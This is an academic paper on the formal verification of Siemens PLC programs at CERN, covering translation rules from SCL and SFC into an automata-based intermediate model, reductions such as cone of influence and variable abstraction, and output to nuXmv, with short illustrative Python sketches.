Manuscript received June 30, 2014; revised June 29, 2015; accepted September 28, 2015. Date of publication October 08, 2015; date of current version December 02, 2015. Paper no. TII-15-0081. B. Fernández Adiego, D. Darvas, E. Blanco Viñuela, and J.-C. Tournier are with the European Organization for Nuclear Research (CERN), Geneva 1211, Switzerland (e-mail: [email protected]; [email protected]; [email protected]; [email protected]). S. Bliudze is with the École polytechnique fédérale de Lausanne, Lausanne 1015, Switzerland (e-mail: [email protected]). J. O. Blech is with Royal Melbourne Institute of Technology (RMIT) University, Melbourne, VIC 3000, Australia (e-mail: [email protected]). V. M. González Suárez is with the University of Oviedo, Oviedo 33003, Spain (e-mail: [email protected]). Digital Object Identifier 10.1109/TII.2015.2489184

I. Introduction
DEVELOPING safe and robust programmable logic controller (PLC)-based control systems is a challenging task for control system engineers. One of the biggest difficulties is to ensure that the PLC program fulfills the system specification. Some standards, such as IEC 61508 [1], give some guidelines and good practices, but this task remains challenging. Many different techniques are widely applied in industry meant to check PLC programs, e.g., manual and automated testing or simulation facilities. However, they still present some significant problems, like the difficulty to check safety or liveness properties, e.g., ensuring that a forbidden output value combination never occurs. Formal verification techniques can handle these problems, but bring other challenges to the control engineers, such as the construction of the formal models and the state space explosion when applied to real-life software applications.

A. Contribution
Our motivation is to find software faults (bugs) by applying automated formal verification of complex properties expressed in temporal logic to real-life PLC control systems developed at CERN, the European Organization for Nuclear Research.
We provide a general methodology for automatic creation and verification of formal models from code written in different PLC languages, which also handles the state space explosion problem. Although the main focus of this paper is on the transformation of PLC programs into formal models, we provide a description of the full methodology and illustrate it on two real-life examples. The specific contributions of this paper are as follows.
1) We present the formal transformation rules from Structured Text (ST) and Sequential Function Chart (SFC), the two most used languages in CERN PLC control systems, to the intermediate model (IM) and give an overview of the transformation from IM to one of the selected model checker modeling languages: nuXmv. This is presented in Section IV.
2) The methods proposed in our previous work are extended to be applicable to large, industrial-size PLC programs. The methodology has been applied to real-life systems at CERN. The experimental results are discussed in Section V.
This paper presents an extension of a previous work meant to bring formal verification to the industrial automation community. A first method [2] was proposed to model various software components of PLC programs developed at CERN, using the BIP framework exclusively. A first version of the transformation rules from ST code to the NuSMV modeling language is described in [3]. Compared to this previous work, this paper: 1) extends and refines the rules presented previously; 2) encompasses other languages than ST; and 3) presents an application of the approach to a real-life case study. The model reduction techniques and the representation of time-related behavior are not in the main scope of this paper, but the methods used in [4] and [5] can be applied here as well.

B. Related Work
Although the application of formal methods to PLC software has been extensively studied in the existing literature [6]-[25], none of the described methods achieves the goals stated above. In [6], one can find a fairly complete survey and classification of PLC verification methods. Using this classification, our method is in the M-A-M group, meaning that it is a model-based approach, and relies on automata and model checking. A recent survey [26] introduces different classifications for model-checking methods applied to the PLC domain. Our method covers many different classes, e.g., it covers multiple PLC languages and multiple system sizes. Furthermore, it aims to be fully automated. The application area is also broad, as PLCs are used for many purposes at CERN.
Some commercial tools, e.g., SCADE from Esterel Technologies (http://www.esterel-technologies.com/products/scade-suite/), provide solutions for the generation of safe PLC programs, where certified PLC code is automatically generated from a formal specification. This approach does not fit the practical industrial requirements, as often already existing PLC programs have to be verified.
In the academic literature, some of the work only targets the modeling of PLCs without providing a verification solution [7].
Other authors apply formal verification, but only for small examples, without discussing the reductions in the models that are inevitable for verifying industrial-sized programs [8]-[16]. Many papers do not address the generation of the model from the PLC program or limit themselves to explaining the high-level principles [10]-[20]. Finally, most of the work targets a single PLC language, with just a few approaches handling multiple ones (e.g., [21] and [22]).
In [18], counterexample-guided abstraction refinement (CEGAR) is applied to models of PLC programs, but only the ACTL (computation tree logic with only universal path quantifiers) formalism is supported for property specifications. The work in [24] uses CEGAR too, but only for reachability analysis. In [23], the authors introduce powerful reduction methods applied to Instruction List (IL) code. Although this approach could be extended to other languages, reliance on satisfiability modulo theories (SMT) solvers restricts its applicability to safety requirements.
Some work targets specifically the verification of ST programs [21], [22]. However, the methods described in [21] restrict the requirements to assertions, which have smaller expressiveness than linear temporal logic (LTL) or computation tree logic (CTL). Although powerful reduction techniques are proposed in [22], they also have strong limitations. For instance, programs can only contain non-Boolean variables and no loops. Applicability of this method for industrial-sized applications at CERN is questionable, since these would contain highly complex Boolean expressions.
The approach based on IM, proposed in this paper, is new in the PLC domain; however, approaches using similar verification techniques have been applied in other domains [27], [28].
This paper is organized as follows. Section II presents a general description of PLCs. Section III is dedicated to an overview of the methodology and the applied IM. Section IV discusses the transformation from the ST and SFC languages to IM and gives a high-level overview of the transformations from IM to nuXmv and of the reduction techniques applied to IM. Section V presents experimental results obtained by applying our methodology to CERN control systems. Finally, in Section VI, we discuss the presented results and possible directions for future work.

II. Programmable Logic Controllers
This section presents the PLC concepts necessary to justify the proposed modeling strategy. A PLC is a widely used programmable electronic device designed for controlling industrial processes. It mainly consists of a processing unit and input/output modules to acquire data from, and act on, the sensors and actuators of the process. Even though the architecture and programming of PLCs are defined in the IEC 61131 standard [29], there are minor differences in the implementations of different manufacturers. In this work, we focus on Siemens PLCs, since these are among the most widely used in the industry and, in particular, at CERN. However, the proposed methodology can be applied to PLCs produced by other manufacturers with only minor adaptation of the transformation rules, necessary to accommodate the variations of PLC programming languages.

A. Execution Scheme
The main particularity of the PLC is its cyclic execution scheme.
It consists of three main steps: 1) reading the input from the periphery to the memory; 2) executing the user program that reads and modifies the memory contents; and 3) writing the values to the output periphery. The cyclic execution can be interrupted if an event (e.g., timer, hardware event, or hardware error) triggers the execution of an interrupt handler. Interrupts are preemptive; they are assigned to priority classes at compilation time.

B. Program Blocks
In Siemens PLCs, several kinds of program blocks are defined for various purposes [30].
1) A function (FC) is a piece of executable code with input, output, and temporary variables. The variables are dynamically stored on a stack and they are not retained after the execution of the function.
2) An organization block (OB) is a special function called by the system. OBs are the entry points of the user code. The main program and the interrupt handlers are implemented as OBs.
3) A data block (DB) is a group of static variables that can be accessed globally in the program. These variables are stored permanently. A DB does not contain any executable code.
4) A function block (FB) is a piece of executable code with input, output, static, and temporary variables. An FB can have several instances and each instance has a separate instance DB that stores its nontemporary variables. Thus, these variables can be accessed globally, even before or after the execution of the FB. The temporary variables are stored on a stack, as the variables of an FC.

C. Programming
PLCs provide several standard programming languages. Five languages are defined in the IEC 61131-3 standard [29]: ST, SFC, Ladder, Function Block Diagram (FBD), and IL. A PLC programmer can choose one or several of these languages, depending on the characteristics of the application, to build the PLC code. The prevalent language at CERN is ST. However, SFC and IL are also used.
IL is a low-level language, syntactically similar to assembly. SFC is a graphical programming language based on finite-state machines (FSMs), described using steps (states) and transitions. Two different kinds of branches are defined: alternative branches (where at most one of the branches can contain active steps) and simultaneous branches (where each branch contains an active step, or none of them). This formalism is similar to safe Petri nets, but the semantics is different: the enabled transitions are evaluated once per call and then only these transitions can fire. If a transition becomes enabled due to a firing, it can fire only on the next call of the SFC. Also, steps can have associated actions, such as variable assignments. This language is useful when part of the PLC program can be represented conveniently as an FSM. ST is a high-level language that is syntactically similar to Pascal.
In this paper, we target ST and SFC as source languages, more precisely the languages corresponding to them in the Siemens implementations: Structured Control Language (SCL) and S7-GRAPH/SFC. The Siemens implementation follows the IEC 61131 standard as stated by the PLCOpen organization (see http://www.plcopen.org/pages/tc3_certification/certified_products/) and [31], but there are small syntactic differences between the standard languages and their implementation.
The SCL language can be used to describe all kinds of program blocks mentioned previously, while SFC can only represent an FB.
Programs written in any of the above languages are compiled into a common byte-code representation, called MC7, which is then transferred to the PLC. Based on our experience, we assume that the MC7 instructions are atomic and cannot be interrupted. A single ST or SFC statement may correspond to several MC7 instructions; thus, it is possible to interrupt an ST or SFC statement.

III. Modeling and Verification Approach
A. Methodology Overview
We propose a general methodology for applying automated formal verification to any PLC program written in one of the PLC languages. To support multiple PLC languages, a valid solution could be to first translate them to IL or to machine code, and then only this single, low-level language has to be targeted by verification. While this method can be general, it can cause some information loss. For example, the evaluation of an arithmetic expression that could be represented both in the high-level PLC language and in the model checker input language will be split into several instructions in IL, making the reductions more difficult and the model checkers less efficient.
Instead, the methodology presented here is based on the IM formalism designed for verification purposes (not for machine execution, as IL). Each language is translated individually to IM. In this way we can benefit from the higher-level inputs (ST vs. IL) that generally provide more information and can be reduced more efficiently. The methodology contains a set of rules which can automatically transform PLC code into different modeling languages passing through IM.
Furthermore, this intermediate step allows us to compare the different model-checking tools in terms of verification performance, simulation facilities, and property specification. More importantly, as each verification tool has different strengths and purposes, we can use the appropriate tool based on our current needs. Currently, translations to the NuSMV/nuXmv, UPPAAL, and BIP verification tools are included in our methodology. IM is based on automata and allows us to extend our methodology with any verification tool which has a similar modeling language (e.g., SAL, Cadence SMV, and LTSmin).

Fig. 1. Overview of our approach.

The proposed approach consists of the following steps (see Fig. 1; a schematic sketch of the pipeline is given after the list).
1) The starting point is the source code of the PLC program and the formalized requirements coming from an informal specification. Using the knowledge of the PLC execution scheme, the PLC code is automatically transformed to IM. This transformation is defined by a set of formal rules presented in Section IV.
2) Several automatic reduction and abstraction techniques are then applied to the generated model, depending on the requirement to be verified.
3) The reduced model is automatically translated to external modeling languages, used by the verification tools.
4) The resulting external models can be formally verified using such tools as nuXmv or UPPAAL. Other tools (e.g., BIP) provide simulation and code generation facilities, which can be useful for PLC developers.
5) Counterexamples produced by model checkers allow PLC developers to analyze the results in order to confirm the presence of bugs in the system or refine the models.
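As a purely illustrative complement, the following self-contained Python fragment mirrors how steps 1) to 5) could be chained. Every function name here is a hypothetical placeholder (none of these names come from PLCverif), and the model checker call is stubbed so that the fragment runs on its own.

    # Hypothetical, self-contained sketch of the five-step pipeline above.
    # The "model checker" is replaced by a trivial stub.

    from dataclasses import dataclass

    @dataclass
    class Result:
        satisfied: bool
        counterexample: str = ""

    # --- placeholder stages (assumptions, standing in for steps 1-4) ----
    def parse_plc_code(source: str):            # step 1: parse SCL/SFC source
        return {"source": source}

    def transform_to_im(ast):                   # step 1: build the IM
        return {"im_of": ast["source"]}

    def reduce_im(im, requirement):             # step 2: COI / rule-based reductions
        return {"reduced": im, "req": requirement}

    def emit_external_model(reduced):           # step 3: e.g. nuXmv input language
        return f"-- model for requirement: {reduced['req']}"

    def run_model_checker(model) -> Result:     # step 4: call the external tool
        return Result(satisfied=True)           # stubbed verdict

    # --- step 5: report the verdict or the counterexample ---------------
    def verify(source: str, requirement: str) -> str:
        im = transform_to_im(parse_plc_code(source))
        model = emit_external_model(reduce_im(im, requirement))
        result = run_model_checker(model)
        return "satisfied" if result.satisfied else "violated:\n" + result.counterexample

    if __name__ == "__main__":
        print(verify("IF a THEN b := TRUE; END_IF;", "AG(a -> b)"))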
B. Intermediate Model
This section describes briefly the syntax and semantics of IM, our automata-based formalism used to represent the PLC programs. We define a simple automata network model consisting of synchronized automata.
A network of automata is a tuple N = (A, I), where A is a finite set of automata and I is a finite set of synchronizations. An automaton is a structure a = (L, T, l_0, V_a, Val_0) ∈ A, where L = {l_0, l_1, ...} is a finite set of locations, T is a finite set of guarded transitions, l_0 ∈ L is the initial location of the automaton, V_a = {v_1, ..., v_m} is a finite set of variables, and Val_0 = (Val_{1,0}, ..., Val_{m,0}) is the initial value of the variables. Let V be the set of all variables in the network of automata N, i.e., V = ⋃_{a∈A} V_a (with V_a ∩ V_b = ∅ for all a, b ∈ A, a ≠ b).
A transition is a tuple t = (l, g, amt, i, l′), where l ∈ L is the source location, g is a logical expression on variables of V that is the guard, amt is the memory change (variable assignment, i.e., a function that defines the new values of the variables in V), i ∈ I ∪ {NONE} is a synchronization attached to the transition, and l′ ∈ L is the target location.
A synchronization is a pair i = (t, t′), where t ∈ T and t′ ∈ T′ are two synchronized transitions in different automata. The variable assignments attached to the transitions t and t′ should not use the same variables. This composition operation is restrictive, but sufficient to model PLC programs, as synchronizations will only represent function calls.
The operational semantics of this automata-based formalism can be informally explained as follows: a transition t = (l, g, amt, i, l′) from the current location l of an automaton is enabled if g is satisfied and either t has no synchronization attached, i.e., i = NONE, or i = (t, t′) and the transition t′ is also enabled. In the former case, t can fire alone; in the latter case, both t and t′ have to fire simultaneously. Each execution step consists in firing one transition or the simultaneous firing of two synchronized ones. Upon firing of a transition t as above, l′ becomes the new current location of the corresponding automaton and the new values of the variables V are set using the previous values and the variable assignment amt.

IV. Model Transformations
This section describes in detail the most relevant transformation rules from SCL and SFC to IM. (In the case of SCL, we have focused on the representation of the key constructs and have omitted the description of, e.g., CASE blocks, REPEAT loops, and FOR loops. The handling of expressions, structure and array initializations, and some Siemens-specific constructs (e.g., shared DBs) is also not discussed, but we have implemented them following the same principles. In the case of SFC, only the action representations are omitted here.) Some of these rules are generic and apply to all PLC languages; the rest are specific to SCL or SFC. In addition, a high-level description of the reduction techniques applied to IM models and the transformation from IM to nuXmv is presented. Also, the main ideas of the tool implementing the methodology and some examples are discussed. This section extends and generalizes the previous work [3].

A. General PLC to IM Transformation
The transformation rules are presented hierarchically, from high-level to low-level rules.
Rule PLC 1 (multiple concurrent code blocks): PLC programs are composed of the main program (i.e., OB1 in Siemens PLCs), which is executed cyclically, and the interrupt handlers.
Assumption 1: Interrupting blocks and the interrupted blocks should use disjoint sets of variables. This is a reasonable assumption, and it can be validated by existing static analysis techniques. According to our experience, different OBs usually use different variables.
Furthermore, a high level of concurrency is rare in PLC programs.
Having this assumption, instead of modeling the interrupts in a preemptive manner, we model them with nonpreemptive semantics: the model of the PLC scheduler consists in the main program being executed at every cycle, whereas one or several interrupts can be executed nondeterministically at the end of the PLC cycle.
Rule PLC 2 (FC): This rule translates functions into IM. An OB can be considered as a special FC that is invoked by the operating system, thus this rule also applies to OBs.
Assumption 2: Recursion is not allowed, i.e., no FC or FB can directly or indirectly generate a call to itself. This assumption is consistent with the IEC 61131 standard [29]. However, Siemens PLCs allow the use of recursion with some restrictions, even if it is not recommended. Recursion can be statically detected by building the call graph of a program and checking whether it contains cycles. Thus, we can assume that the variables of a function are stored at most once on the stack.
For each function Func, we create an automaton A_Func. The locations, transitions, and initial location of this automaton are generated using the rules presented below. For each variable defined in Func, we create a corresponding variable in A_Func. If the return type of the function is different from void, a special output variable called RET_VAL is also added to the automaton. A_Func contains at least the initial location init, the final location end, and the transition t_end from end to init.
Rule PLC 3 (FB instance): This rule translates FB instances into IM. Assumption 2 also applies here.
For each instance inst of each FB FBlock, we create an automaton A_FBlock,inst. The locations, transitions, and initial location of this automaton are generated using the rules presented below. For each variable in FBlock, we create a corresponding variable in all the corresponding A_FBlock,inst automata. Each automaton contains at least the initial location init, the final location end, and the transition t_end from end to init without any guard.
Rule PLC 4 (Variables): This rule maps program variables to variables in the IM model.
Assumption 3: All variables, except system inputs, that do not have uniquely defined initial values on the PLC platform (e.g., temporary variables, output variables of FCs) are written before they are read. This means that we do not have to model such variables as nondeterministic variables in the IM model, which allows us to limit the state space growth of the generated model.
For each variable v in the program block, there is exactly one corresponding variable F_V(v) in the corresponding automaton. If the variable represents a system input (i.e., variables representing signals coming from the field), it is assigned nondeterministically at the beginning of each PLC cycle.

B. SCL to IM Transformation
This section presents the rules specific to the SCL to IM transformation.
Rule SCL 1 (SCL statement): A statement is the smallest standalone element of an SCL program.
It can contain other components (e.g., expressions). There are different kinds of statements, such as conditional branches, loops, and variable assignments. In this section, we define the representation of a single code block consisting of these statements in our IM.
For each statement stmt, let n(stmt) be the next statement after stmt. Furthermore, for a statement list sl, let first(sl) be the first statement of the list. Assumption 1 also applies here.
For each SCL statement stmt in the program block, we generate a corresponding location marked as F_L(stmt) in the corresponding automaton. If stmt is the last statement in the program block, F_L(n(stmt)) is the location end of the corresponding automaton. This general rule is applied to any statement, then the more specific rules presented in the following are applied too.
Rule SCL 2 (variable assignment): This rule translates SCL variable assignments to IM.
Assumption 4: For each variable access, the variable to be accessed can be determined at transformation time. In particular, this means that pointers are not supported. However, we do support compound variables (arrays and user-defined structures). Typically, this is not a restriction, as the usage of pointers is not recommended in PLC programs.
For each variable assignment stmt = ⟨v := Expr⟩, we add to the corresponding automaton a transition t = (F_L(stmt), TRUE, ⟨F_V(v) := Expr⟩, NONE, F_L(n(stmt))), going from F_L(stmt) to F_L(n(stmt)) with no guard and no synchronization. The assignment associated with the transition updates only the variable F_V(v).
Rule SCL 3 (conditional statement): For each conditional statement stmt = ⟨IF c THEN sl1 ELSE sl2 END_IF⟩, we add two transitions to the corresponding automaton.
1) t1 = (F_L(stmt), c, ⟨⟩, NONE, F_L(first(sl1))) goes from F_L(stmt) to F_L(first(sl1)); it has no assignments and no synchronizations, and it has the guard c.
2) t2 = (F_L(stmt), ¬c, ⟨⟩, NONE, F_L(first(sl2))) goes from F_L(stmt) to F_L(first(sl2)); it has no assignments, no synchronizations, and the guard ¬c.
Rule SCL 4 (while loop): For each while loop stmt = ⟨WHILE c DO sl END_WHILE⟩, we add two transitions to the corresponding automaton.
1) t1 = (F_L(stmt), c, ⟨⟩, NONE, F_L(first(sl))) goes from F_L(stmt) to F_L(first(sl)); it has no assignments and no synchronizations, and it has the guard c.
2) t2 = (F_L(stmt), ¬c, ⟨⟩, NONE, F_L(n(stmt))) goes from F_L(stmt) to F_L(n(stmt)); it has no assignments, no synchronizations, and the guard ¬c. This transition corresponds to exiting the loop.
Note that if stmt is a while loop, n(stmt) will denote the next statement after the loop. If the last statement of the loop body is stmt′, then n(stmt′) = stmt, as after executing the last statement of the loop body, the next step is to check the condition again. The for and repeat loops can be expressed based on the rules for conditional branches and while loops.
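To make Rules SCL 2 and SCL 3 more tangible, the following Python fragment sketches the IM data structures of Section III-B and a drastically simplified version of the translation. It is not the implementation used by the authors; the class and helper names (Transition, Automaton, translate_block) are hypothetical, guards and assignments are kept as plain strings, and the IF rule is collapsed so that each branch consists of a single assignment leading directly to the next statement's location.

    # Illustrative sketch only: simplified IM structures and a toy
    # application of Rules SCL 2 (assignment) and SCL 3 (IF branch).

    from dataclasses import dataclass, field
    from typing import Optional

    @dataclass
    class Transition:
        source: str                 # source location l
        guard: str                  # guard g (textual, e.g. "TRUE" or "NOT c")
        assignment: Optional[str]   # memory change amt, e.g. "x := 1"
        sync: Optional[str]         # synchronization i, or None
        target: str                 # target location l'

    @dataclass
    class Automaton:
        name: str
        locations: list = field(default_factory=list)
        transitions: list = field(default_factory=list)
        initial: str = "init"

    def translate_block(name: str, statements: list) -> Automaton:
        """Translate a flat list of statements, each given either as
        ('assign', 'x := e') or ('if', cond, then_assign, else_assign)."""
        aut = Automaton(name=name, locations=["init", "end"])
        locs = [f"l{i + 1}" for i in range(len(statements))] + ["end"]
        aut.locations += locs[:-1]
        aut.transitions.append(Transition("init", "TRUE", None, None, locs[0]))
        for i, stmt in enumerate(statements):
            src, nxt = locs[i], locs[i + 1]
            if stmt[0] == "assign":                       # Rule SCL 2
                aut.transitions.append(Transition(src, "TRUE", stmt[1], None, nxt))
            elif stmt[0] == "if":                         # Rule SCL 3 (collapsed branches)
                cond, then_assign, else_assign = stmt[1], stmt[2], stmt[3]
                aut.transitions.append(Transition(src, cond, then_assign, None, nxt))
                aut.transitions.append(Transition(src, f"NOT ({cond})", else_assign, None, nxt))
        aut.transitions.append(Transition("end", "TRUE", None, None, "init"))  # t_end
        return aut

    if __name__ == "__main__":
        a = translate_block("A_Func", [
            ("assign", "ib := 0"),
            ("if", "ia > 0", "ob := TRUE", "ob := FALSE"),
        ])
        for t in a.transitions:
            print(f"{t.source} --[{t.guard}] {t.assignment or ''}--> {t.target}")

In the full rules, the two branches of an IF jump to first(sl1) and first(sl2) and every contained statement receives its own location; the sketch collapses this on purpose to stay short.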
Rule SCL 5 (FC or FB call):
Assumption 5: All the input variables are assigned in the caller, and all the output variables are assigned in the callee, to avoid accessing uninitialized variables that could contain unpredictable values. Therefore, they are not modeled as nondeterministic variables, which allows us to limit the state space growth of the generated model.
For every function (block) call stmt = ⟨[r :=] Func(p1 := Expr1, p2 := Expr2, ...)⟩ in a code block represented by an automaton A_caller, we add the following elements. (Func can be a function or an instance of an FB, represented by an automaton A_callee. If Func is an FB or a void function, the "r :=" part is omitted.)
1) A new location l_wait is added to A_caller. It represents the state when the caller block is waiting for the end of the function call. (For every function call, we add a separate l_wait location.)
2) A transition t1 is added to A_caller, which has no guard and goes from F_L(stmt) to l_wait. It assigns the function call parameters to the corresponding variables in A_callee. (It assigns Expr1 to F_V(p1), etc.)
3) A transition t2 is added to A_caller, which has no guard and goes from l_wait to F_L(n(stmt)). It assigns RET_VAL of the callee to the corresponding variable (variable F_V(r)) in A_caller, if RET_VAL exists. It also assigns the corresponding values to the output variables.
4) A synchronization i1 is added to the automata network, connecting transition t1 with the first transition of A_callee.
5) A synchronization i2 is added to the automata network, connecting transition t_end of A_callee with transition t2.

C. SFC to IM Transformation
This section presents a high-level overview of the rules specific to the SFC to IM transformation. In the following discussion, we do not target the actions that can be assigned to the SFC steps. However, based on the SCL and SFC transformation rules, they can be incorporated easily.
The main idea of the following transformation is that for each SFC step s, we create two variables: the step flag variable, a variable that indicates whether the current step is active, denoted as s.x in the standard and in the Siemens implementation; and another variable that will store a copy of the s.x variables at the beginning of the SFC's call (denoted by s.x′ in the following example). The conditions of the transitions will be evaluated on this copy, thus the firing of a transition cannot make new transitions enabled.
Rule SFC 1 (SFC step): For each step ⟨STEP stepName : END_STEP⟩, we create a Boolean variable F_V(stepName) (representing the variable referenced as stepName.x in the PLC programs or in the standard [29]) and a variable F′_V(stepName) for internal purposes, both initialized to FALSE.
Rule SFC 2 (SFC initial step): For the initial step ⟨INITIAL_STEP initStep : END_STEP⟩, variables are created according to the previous rule. We also add a location l_0, and a transition t_IM = (l_0, g, amt, NONE, end), where g = (¬F_V(stepName1) ∧ ¬F_V(stepName2) ∧ ...) and amt = ⟨F_V(initStep) := TRUE⟩. It means that if no steps are active, then the initial step should become active.
Before discussing the representation of transitions, we define a set W = {w1, w2, ...}. Each item of W is a pair wi = (Si, Ti), where Si is a possible transition input (a step or set of steps occurring in one of the transitions' FROM parts) and Ti is the set of SFC transitions outgoing from Si. The union of the Ti sets in W should contain all the transitions of the SFC.
A transition input (Si) is typically one single SFC step, but for the transitions closing simultaneous branches, it can be composed of multiple SFC steps. These latter transitions have multiple "from" steps and one "to" step. (In the following, let l_{|W|+1} = end.)
Rule SFC 3 (SFC transitions):
Assumption 6: Based on our experiments with the SFC editor of Siemens, we assume that transitions are defined in ascending order of priority in the textual representation that is our input (i.e., the first transition in the textual representation has the lowest priority). Also, if there is a transition that is leaving multiple steps at the same time (thus closing a simultaneous branch), there should not be any other transition leaving any of these steps. If this is not respected, the SFC is regarded as syntactically incorrect in the Siemens tools.
For each wi = (Si, Ti) = ({s1, s2, ...}, {t1, t2, ...}) in W, we create the following IM representation: We create a location l_i. For each tj = ⟨TRANSITION tName FROM s1, s2, ... TO s′_j1, s′_j2, ... CONDITION := C END_TRANSITION⟩, we create a transition t_IM = (l_i, g_IM, amt, NONE, l_{i+1}). The guard g_IM of t_IM is a Boolean expression that is only true if C is true, F′_V(s1), F′_V(s2), ... are true, and all the guards of transitions t1, ..., t_{j-1} are false. In other words, the condition of the SFC transition should be satisfied, the input SFC step(s) should be active, and no higher-priority event leaving the same SFC step(s) can fire. The assignment is amt = ⟨F_V(s1) := FALSE; F_V(s2) := FALSE; ...; F_V(s′_j1) := TRUE; F_V(s′_j2) := TRUE; ...⟩. (We assume that t1, t2, ... are indexed in descending order of priority.) Also, for each wi, we add a transition t′_IM = (l_i, g′, ⟨⟩, NONE, l_{i+1}), where g′ is true if no other l_i → l_{i+1} IM transitions are enabled. If no SFC transitions are allowed from Si (or Si is not active), this transition allows us to proceed to the other transitions.
Rule SFC 4 (SFC block): This rule adds the needed extra information for SFC blocks to the IM. We add a transition t_IM from init to l_0 that performs a F′_V(s) := F_V(s) assignment for every SFC step s. The guard of transition t_IM is true if any of the steps is active.

D. Reductions on the IM
The transformation described above allows us to create an IM representation of a PLC program. However, verification of the models produced from real-life programs is still not feasible with the available tools. In order to address this issue, we apply property-preserving reductions to the IM model. This emphasizes the advantage of using an IM: the reductions are only performed once and propagate automatically to the models generated for the various verification tools.
1) The cone of influence (COI) reduction eliminates all the variables that do not influence those that contribute to the requirement under analysis (a minimal sketch of this reduction is given after this list).
2) General rule-based reductions simplify the model by merging states or variables, eliminating unnecessary conditional branches, simplifying the Boolean expressions, etc.
3) Using the mode selection, certain inputs (representing parameters) of the modeled system can be fixed. By introducing these constraints in the IM model instead of in the requirement, the other reduction methods can benefit from this knowledge.
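The cone-of-influence reduction mentioned in item 1 can be sketched as a simple backward reachability over a variable-dependency relation. The Python fragment below is illustrative only and assumes the dependencies have already been extracted from the IM; the names cone_of_influence and dependencies are hypothetical and do not come from the authors' tool.

    # Minimal COI sketch: keep every variable reachable backwards from the
    # variables occurring in the requirement; all others can be removed.

    from collections import deque

    def cone_of_influence(dependencies: dict, requirement_vars: set) -> set:
        """dependencies maps a variable to the set of variables its value
        depends on (through assignments, guards, etc.)."""
        keep = set(requirement_vars)
        todo = deque(requirement_vars)
        while todo:
            v = todo.popleft()
            for dep in dependencies.get(v, ()):
                if dep not in keep:
                    keep.add(dep)
                    todo.append(dep)
        return keep

    if __name__ == "__main__":
        # b depends on a and x; a depends on y; z is unrelated to b.
        deps = {"b": {"a", "x"}, "a": {"y"}, "z": {"x"}}
        print(sorted(cone_of_influence(deps, {"b"})))   # ['a', 'b', 'x', 'y']
        # every variable outside this set can be dropped from the model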
These reductions are presented in more detail in [4].
In addition to the reductions above, we have developed a new method called variable abstraction. This technique is an iterative method focused on the verification of simple safety requirements, e.g., "if α is true, then β shall be true" (AG(α → β) in CTL), where α and β denote Boolean expressions on variables. This technique builds the abstract models automatically using the variable-dependency graph of β. These models are built by replacing the selected variables with nondeterministic values (similar to the input variables). Since these variables do not depend on any others, the COI algorithm can eliminate more variables from the model.

Fig. 2. Variable dependency graph of an example PLC program.

Fig. 2 shows a simple variable dependency graph for the requirement AG(a → b) (so α = {a} and β = {b} in this example). In this graph, nodes represent variables. The gray variables are part of the requirement (a and b) and the edges represent dependencies (e.g., an assignment or a conditional statement). We defined a distance metric δ for each variable of the graph. Its value is the smallest distance from a variable in β. In the i-th iteration, the variables with δ = i are replaced by nondeterministic values and the variables with δ > i are deleted. If for any a ∈ α, δ(a) > i, then a is replaced by a nondeterministic value instead of being deleted.
In the first iteration of the example, the variables to be replaced by nondeterministic values are a, y, and x. If the verification result is true, then the safety requirement is satisfied on the original model, as the abstract model is an over-approximation of the original one. If the verification result is false and it cannot be determined whether the counterexample is real or spurious, a new iteration is needed.
More precisely, in order to abstract a set of variables V, we perform the following steps on the abstract syntax tree of the PLC code, for each v ∈ V.
1) All assignments of the variable v are removed.
2) An assignment v := undefined is added at the beginning of the scan cycle, meaning that the value of v will be undefined and it will take any value from its domain.
This technique is sound, i.e., if a safety property holds after variable abstraction, it holds in the original system. However, it is not complete, meaning that spurious safety violations can be detected, since variable abstraction generates behaviors not present in the original system. Such spurious violations can be detected by analyzing the counterexamples. Variable abstraction is illustrated in Section V and its implications on the verification process are discussed in Section VI.

E. IM to nuXmv Transformation
The IM model representing the PLC code has to be transformed into the concrete syntax of one or more model checking tools to verify the given requirements. Our methodology is general and can be applied to any model checker with an input language based on automata or transition systems. Here, we briefly introduce the transformation from IM to the input language of nuXmv [32] as an example.
For each automaton A in the IM model, we create a module M_A in the nuXmv model with exactly one instance. Each variable in A is represented by a variable in the module M_A.
E. IM → nuXmv Transformation

The IM model representing the PLC code has to be transformed into the concrete syntax of one or more model checking tools to verify the given requirements. Our methodology is general and can be applied to any model checker with an input language based on automata or transition systems. Here, we briefly introduce the transformation from IM to the input language of nuXmv [32] as an example.

For each automaton A in the IM model, we create a module M_A in the nuXmv model with exactly one instance. Each variable in A is represented by a variable in the module M_A. Furthermore, a variable loc is added to each module M_A that represents the current location of the automaton A. A module main is also created in the nuXmv model, containing a variable synch enumerating all possible synchronizations and the value NONE. At each cycle, this variable encodes the synchronization to be performed.

F. Transformation Examples

The following shows two examples of the transformations described in this section.

Fig. 3. Example SCL → IM → nuXmv translation.

Fig. 3 shows an example transformation from SCL code (1) through the IM model (2) to the nuXmv model (3). The SCL code contains a conditional statement, a while loop and three variable assignments to Boolean and integer variables. In Part 2 of Fig. 3, one can observe the true and false branches of the conditional statement (l1 → l2 and l1 → l3) and the representation of the while loop (l3 → l4). The key ideas of the transformation to nuXmv can be seen in Part 3. The variable loc defined in line 3 represents the locations of the automaton. The transitions and guards are defined by the case statement in lines 9–21 (e.g., line 13 represents the transition l1 → l2 with guard [ia > 0]). The variable updates are given separately in lines 23–38 (e.g., loc = l4 : (IB + 0sd16_1) in line 30 for the variable update ib := ib + 1 of transition l4 → l5). The global structure (e.g., main module, instances, random value handling) of the generated nuXmv model can also be observed.
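As an illustration of this module structure, the sketch below emits a skeleton of a nuXmv module for one IM automaton: a loc variable for the locations, a case expression selecting the successor location, and a main module with a synch variable. It is a rough approximation of the shape of the generated models described above, with hypothetical helper functions; it is not the actual generator, and the emitted text only covers the location logic, not the variable updates or synchronizations.

```python
def emit_module(name, locations, transitions):
    """transitions: list of (source, guard, target); guards are nuXmv expressions,
    possibly over module variables that a full generator would also declare."""
    lines = [f"MODULE {name}", "VAR",
             f"  loc : {{{', '.join(locations)}}};",
             "ASSIGN",
             f"  init(loc) := {locations[0]};",
             "  next(loc) := case"]
    for src, guard, dst in transitions:
        lines.append(f"    loc = {src} & ({guard}) : {dst};")
    lines.append("    TRUE : loc;  -- stay if no transition is enabled")
    lines.append("  esac;")
    return "\n".join(lines)

def emit_main(instances):
    decls = [f"  {inst} : {mod};" for inst, mod in instances]
    return "\n".join(["MODULE main", "VAR",
                      "  synch : {NONE, call_fb};  -- enumerates possible synchronizations",
                      *decls])

# Example: a two-location automaton with a single guarded transition
print(emit_module("M_A", ["l1", "l2"], [("l1", "ia > 0sd16_0", "l2")]))
print(emit_main([("a1", "M_A")]))
```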
Fig. 4. Example SFC → IM translation.

